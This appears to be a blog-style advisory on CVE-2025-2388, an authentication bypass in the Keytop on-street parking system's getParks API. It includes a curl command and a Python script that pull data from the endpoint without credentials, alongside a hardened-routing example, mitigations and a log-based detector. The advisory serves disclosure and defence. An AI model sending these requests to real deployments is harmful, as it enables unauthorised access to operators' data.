CVE-2025-2388 - Critical Authentication Bypass in Keytop 路内停车收费系统 2.7.1 Exposed

---

Introduction

A serious security vulnerability, CVE-2025-2388, has been uncovered in the Keytop 路内停车收费系统 (Keytop On-street Parking Charging System) version 2.7.1. The flaw affects the /saas/commonApi/park/getParks API endpoint and, if exploited, lets attackers bypass authentication controls. In this article, I’ll break down the impact, technical details, example code, exploitation steps, and how to stay protected.

What is Keytop 路内停车收费系统?

Keytop is a widely used Chinese smart parking system for managing street parking and charging processes in many cities. The system uses web APIs to communicate between parking meters, apps, and backend servers.

Vulnerability Type: Improper Authentication

- Location: /saas/commonApi/park/getParks API endpoint
- Impact: Attackers may remotely access backend data without valid login credentials.
- CVSS Score: Critical (9.1/10)
- Disclosure: Public exploit is available.

Original Advisory:
- GitHub Advisory
- NVD Record (Pending)

Vulnerability Details

The /saas/commonApi/park/getParks endpoint is meant to be accessed only by authenticated users. However, due to improper authentication checks, any remote actor can access it without session tokens or a login.

Example Exploitation

Below is a step-by-step example showing how an attacker could exploit the bug.

Let’s say you find a Keytop parking management system at

http://example-keytop.com/

Example Request (using curl)

curl -k "http://example-keytop.com/saas/commonApi/park/getParks"

Python Script Example

import requests

# Placeholder host from this article; the endpoint path is the vulnerable one.
target_url = "http://example-keytop.com/saas/commonApi/park/getParks"
# No cookie, session or token is sent, yet the vulnerable backend answers.
response = requests.get(target_url)
print(response.text)

Typical Response

{
    "code": ,
    "data": [
        {
            "parkId": "123",
            "parkName": "Downtown Parking Zone",
            "address": "123 Main St",
            ...
        },
        {
            "parkId": "124",
            "parkName": "East Garage",
            ...
        }
    ]
}

Technical Analysis

Root Cause:
The backend does not check or validate any session, cookie or token before serving the sensitive /getParks API, so any unauthenticated client can retrieve the data it returns.
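To make the root cause concrete, here is an added illustration (not Keytop's code and not from the advisory): a deliberately simplified request router in which authentication is left to each handler and the getParks handler performs none, placed beside a hardened version that authenticates centrally and denies by default. The handler names, the session store and the Bearer-token header are assumptions made for this demo.

```python
# Added illustration, not Keytop's code: a simplified request router that
# shows the root cause described above (per-handler, opt-in authentication
# that the getParks handler never performs) beside a hardened, deny-by-default
# version. Handler names, the session store and the Bearer-token header are
# assumptions made for this demo.
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

# Constructed sample records standing in for the backend's park data.
PARKS = [
    {"parkId": "123", "parkName": "Downtown Parking Zone"},
    {"parkId": "124", "parkName": "East Garage"},
]

# Constructed session store (token -> user); a real system would use a
# database or cache with expiring tokens.
SESSIONS = {"tok-abc": "operator-1"}

GETPARKS_PATH = "/saas/commonApi/park/getParks"


@dataclass
class Request:
    path: str
    headers: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    body: dict


def get_parks(req: Request) -> Response:
    """Business handler: returns the park list and has no auth logic of its own."""
    return Response(200, {"code": 0, "data": PARKS})


ROUTES: Dict[str, Callable[[Request], Response]] = {GETPARKS_PATH: get_parks}


# --- Vulnerable pattern (the advisory's root cause) -------------------------
# Each handler is trusted to authenticate for itself; get_parks does not,
# so the dispatcher serves data to anyone who knows the path.
def vulnerable_dispatch(req: Request) -> Response:
    handler = ROUTES.get(req.path)
    if handler is None:
        return Response(404, {"code": 404, "msg": "not found"})
    return handler(req)


# --- Hardened pattern: authenticate centrally, deny by default --------------
# Only paths on an explicit allow-list may be served anonymously; every other
# route must present a valid session before its handler runs.
PUBLIC_PATHS = frozenset({"/health"})


def authenticate(req: Request) -> Optional[str]:
    """Return the user bound to the request's Bearer token, or None."""
    auth = req.headers.get("Authorization", "")
    scheme, _, token = auth.partition(" ")
    if scheme != "Bearer" or not token:
        return None
    return SESSIONS.get(token)


def hardened_dispatch(req: Request) -> Response:
    if req.path not in PUBLIC_PATHS and authenticate(req) is None:
        # Reject before any handler can touch data; no route is exempt
        # unless it was deliberately listed as public.
        return Response(401, {"code": 401, "msg": "authentication required"})
    handler = ROUTES.get(req.path)
    if handler is None:
        return Response(404, {"code": 404, "msg": "not found"})
    return handler(req)


if __name__ == "__main__":
    anon = Request(GETPARKS_PATH)
    print("vulnerable, no credentials:", vulnerable_dispatch(anon).status)  # 200
    print("hardened, no credentials:  ", hardened_dispatch(anon).status)    # 401
    authed = Request(GETPARKS_PATH, {"Authorization": "Bearer tok-abc"})
    print("hardened, valid token:     ", hardened_dispatch(authed).status)  # 200
```

The design point is where the check lives: in the hardened router the authentication decision is made once, before dispatch, and a route only becomes anonymous by being added to PUBLIC_PATHS. A handler that forgets to check credentials, which is exactly the failure behind this CVE, then fails closed instead of open.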

How to Patch or Mitigate

- VENDOR PATCH: No official patch at the time of writing. Monitor the Keytop website or contact support.

Workaround:

- Restrict public access to /saas/commonApi/park/getParks on firewalls.
- Require authentication (token/session) on all endpoints.
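While the vendor patch is outstanding, operators will also want to know whether the endpoint has already been reached from outside the networks they intend to allow. The following is an added detection example, not part of the advisory or of Keytop's product: it scans web-server access logs in the common "combined" format for requests to the vulnerable path from disallowed sources and ranks those answered 200 (data was served) above those the server rejected. The allowed network range, the sample log lines and the helper names are all constructed for this demo.

```python
# Added detection example, not from the advisory or the vendor: scan
# combined-format access logs for requests to the vulnerable endpoint that
# came from outside the networks allowed to reach it. The allowed range, the
# log lines and the helper names are constructed for this demo.
import ipaddress
import re
from typing import Dict, List

VULN_PATH = "/saas/commonApi/park/getParks"

# Assumption: only management hosts in this range should reach the API
# (the advisory's "restrict public access" workaround).
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# combined format: ip ident user [time] "METHOD path PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = """\
10.20.3.7 - - [17/Mar/2025:18:20:01 +0000] "GET /saas/commonApi/park/getParks HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Mar/2025:18:21:45 +0000] "GET /saas/commonApi/park/getParks HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.9 - - [17/Mar/2025:18:21:46 +0000] "GET /saas/commonApi/park/getParks?page=2 HTTP/1.1" 401 0 "-" "curl/8.4.0"
198.51.100.4 - - [17/Mar/2025:18:22:10 +0000] "GET /static/app.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
garbage line that does not parse
"""


def is_allowed_source(ip: str) -> bool:
    """True when the client address lies inside one of ALLOWED_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable address: treat as untrusted
    return any(addr in net for net in ALLOWED_NETS)


def analyze(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per request to VULN_PATH from a disallowed source."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if path != VULN_PATH or is_allowed_source(m.group("ip")):
            continue
        served = m.group("status") == "200"
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "status": m.group("status"),
            # 200 means the backend handed data to an external caller;
            # anything else is an attempt the server turned away.
            "severity": "high" if served else "medium",
            "reason": ("getParks served to external source" if served
                       else "getParks probed from external source"),
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['time']} {f['ip']} "
              f"status={f['status']} {f['reason']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents and ALLOWED_NETS with the ranges your firewall rule permits; once the workaround is in place, any new "high" finding means the restriction is not being enforced where that traffic enters.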

References

- PeiQi Wiki Advisory (Chinese)
- Project Home/Keytop

Conclusion

CVE-2025-2388 is a critical, easy-to-exploit authentication vulnerability affecting Keytop’s street parking backend. Attackers can retrieve sensitive operational data without needing to log in. If you use or operate this system, act now: restrict access and push for a vendor patch.

Timeline

Published on: 03/17/2025 18:15:22 UTC